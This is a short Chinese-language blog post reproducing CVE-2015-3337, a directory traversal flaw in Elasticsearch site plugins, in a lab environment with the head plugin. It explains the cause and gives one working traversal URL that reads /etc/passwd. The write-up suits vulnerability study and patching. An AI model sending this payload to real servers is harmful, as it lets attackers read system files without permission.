ElasticSearch 目录穿越漏洞


ElasticSearch 目录穿越漏洞(CVE-2015-3337)

jre版本:openjdk:8-jre
elasticsearch版本:v1.4.4
影响版本:1.4.5以下/1.5.2以下

原理

在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

head插件

head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/
_plugin/head/ 即可看到。

漏洞复现

测试环境默认安装了一个插件:elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
ElasticSearch 目录穿越漏洞 ElasticSearch 目录穿越漏洞
ElasticSearch 目录穿越漏洞(CVE-2015-5531)jre版本:openjdk:8-jreelasticsearch版本:v1.6.0影响版本:1.6.1以下 elasticsearch 1.5.1及以前,无需任何配置即可
2019-06-08 Geekby
下一篇 
ElasticSearch Groovy 沙盒绕过 ElasticSearch Groovy 沙盒绕过
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)jre版本:openjdk:8-jreelasticsearch版本:v1.4.2 CVE-2014-3120后,Elast
2019-06-08 Geekby
  目录